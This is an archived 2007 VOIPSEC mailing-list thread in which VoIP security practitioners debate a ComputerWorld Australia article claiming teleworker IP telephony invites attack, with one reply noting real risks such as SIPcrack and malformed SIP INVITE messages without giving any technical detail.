[VOIPSEC] ComputerWorld.au: "Enterprises must avoid IP telephony for teleworkers or face attack" - and my response

Simon Horne s.horne at packetizer.com
Fri Mar 9 01:33:48 CST 2007 

Guys

You also have to be careful to review the story carefully (aside from the 
hype) and see that a lot of what is being said is true. Most teleworkers do 
not have access to secure VoIP and if they did, it's expensive and may or 
may not interwork with their existing PBX systems. Not mentioned in the 
article is the other more serious issues such as hacking the Border 
controller. (The program SIPcrack is an example of how easy that is) and 
the malformed or large INVITE message vulnerability of some SIP servers 
which if the INVITE is formed in a certain manner can bring down even the 
most expensive SIP server.

You shouldn't just throw out the story because it's critical or 
over-hyped.  A lot of it (not all) is perfectly valid to a simple 
teleworker in Australia, maybe not to VoIP security experts in the US who 
has access to all the latest VoIP security stuff simple Joe Blow in 
Australia doesn't.

On a side note: Lets be honest, a lot of people have profited from this 
type of poorly researched sensationalist journalism. In fact the VoIP 
industry would not be where it is today without it. Over the years I have 
read a lot of nonsense which promotes an agenda or the flavor of the month 
"Hype". I think we are only feeling it now because some of the luster is 
wearing thin.

Like for instance I read the other day this story
"RADIUS Billing a Thing of the Past: SIP Takes Over"

huh? SIP takes over radius billing? What has SIP to do with billing? I 
researched further and found another article to do with SIP and RADIUS in 
the same magazine and in the body of the article the author had made a 
small typo and put SIP or RADIUS is a good fit ...instead of SIP and RADIUS 
is a good fit... Obviously the ill-informed author had seized upon that 
typo to create and "hype" a new story without researching the facts on what 
exactly RADIUS is.

I think we have to be careful not to believe/react/promote our own press 
and stay focused on delivering real world (not just another RFC draft) 
secure voice/video solutions to Joe Blow in Australia.

My 2 cents

Simon





At 05:19 AM 9/03/2007, dave_endler at 3com.com wrote:
>Yikes, I'm just now catching up from email after VoiceCon and finally had a
>chance to read the ComputerWorld article.  I didn't realize until now that I
>had been quoted in it.
>
>Mark Collier and I presented a 3 hour tutorial on VoIP security this Monday
>at VoiceCon where I think the reporter grabbed all of those quotes from.
>It's unfortunate that the reporter took about 15 minutes worth of our
>presentation and used it to further his faulty premise. Our presentation
>outlined certain threats to general VoIP installations, and then detailed
>the specific countermeasures that could be applied to mitigate each threat.
>Mark and I stated several times throughout our presentation that even though
>there are security concerns associated with deploying VoIP (as with any
>application), all of the enterprise class VoIP solutions that we had tested
>are securable with the right amount of effort and research.  It's a shame
>that point didn't get included in the article.
>
>Dan York is spot on with his rebuttal on the VOIPSA blog.  Having been in
>the security industry for a while, I'm not as surprised anymore at fear
>based reporting.  It's just a little more upsetting when it's your own words
>being taken out of context to sex up a headline.
>
>My hope is that as VOIPSA grows as a voice piece in this industry, we can
>continue to combat this type of FUD with our projects, guidelines, and
>outreach messaging.
>
>-dave
>
>Obligatory disclaimer, I work for TippingPoint, which is a division of 3Com
>that develops VoIP products.
>
>David Endler
>Director of Security Research
>TippingPoint, a Division of 3Com
>
>-----Original Message-----
>From: voipsec-bounces at voipsa.org [mailto:voipsec-bounces at voipsa.org] On
>Behalf Of dan_york at Mitel.com
>Sent: Tuesday, March 06, 2007 3:00 PM
>To: voipsec at voipsa.org
>Subject: Re: [VOIPSEC] ComputerWorld.au: "Enterprises must avoid IP
>telephony for teleworkers or face attack" - and my response
>
>Mason,
>
>Sadly, I think we will continue to see this coverage for some time.
>Telling people that VoIP works great for teleworkers (when done right)
>doesn't "sell papers" (or, in today's lingo, "attract links").  Conflict
>does.  Fear does.  Ergo... this kind of coverage.  (Cue "It's the End of
>the World as we Know It!"... dang... I need to get a
>"free-to-play-on-a-podcast" version of that song to play on Blue Box!)
>
>Thanks,
>Dan
>--
>Dan York, CISSP
>Dir of IP Technology, Office of the CTO
>Mitel       http://www.mitel.com
>dan_york at mitel.com +1-613-592-2122
>PGP key (F7E3C3B4) available for
>secure communication
>
>
>
>
>
>
>Mason Harris <maharris at cisco.com>
>Sent by: voipsec-bounces at voipsa.org
>03/05/2007 03:45 PM
>Please respond to maharris
>
>         To:     dan_york at Mitel.com
>         cc:     voipsec at voipsa.org
>         Subject:        Re: [VOIPSEC] ComputerWorld.au: "Enterprises must
>avoid IP telephony for teleworkers or face attack" - and my response
>
>
>Dan, i thought your rebuttal in the blog was spot on. Clearly this a
>headline aimed at creating paranoia for the uninformed public.
>
>The headline could have just as easily read "Enterprises must avoid
>internet access for remote teleworkers or face attack"
>
>Again we need to help educate the general public that all security
>controls still apply when connecting your IPTel solution to the internet
>(split-tunneling is bad, change default pws, turn off unecessary
>servers, etc.)
>
>Sadly we'll probably continue to see this kind of "the sky is falling"
>media coverage as teleworker deployments proliferate. Knowledge is power
>in this case, i suppose.
>
>cheers,
>Mason
>
>
>dan_york at Mitel.com wrote:
> > VOIPSEC readers,
> >
> > FYI, ComputerWorld in Australia came out today with the article
> > "Enterprises must avoid IP telephony for teleworkers or face attack"
>found
> > at:
> >
> >   http://www.computerworld.com.au/index.php/id;350011373
> >
> > Since I use (secure) teleworker phones every day, I was rather annoyed
>at
> > their headline and wrote this response (since I couldn't comment at
> > ComputerWorld.au):
> >
> >
> >
>http://voipsa.org/blog/2007/03/05/why-computerworldau-is-dead-wrong-about-en
>terprises-must-avoid-ip-telephony-for-teleworkers-or-face-attack/
>
> >
> > As you would expect, I will naturally talk about this on this week's
>Blue
> > Box podcast when Jonathan and I record it later this week.
> >
> > Given that ComputerWorld.au is an IDG property, I would expect that this
>
> > article might show up on other IDG websites over the next while.  (PC
> > World, Linux World, Computer World, InfoWorld, NetworkWorld, CIO, CSO,
> > etc.)
> >
> > Regards,
> > Dan
> >
>
>_______________________________________________
>Voipsec mailing list
>Voipsec at voipsa.org
>http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
>
>_______________________________________________
>Voipsec mailing list
>Voipsec at voipsa.org
>http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
>
>
>
>_______________________________________________
>Voipsec mailing list
>Voipsec at voipsa.org
>http://voipsa.org/mailman/listinfo/voipsec_voipsa.org

More information about the Voipsec mailing list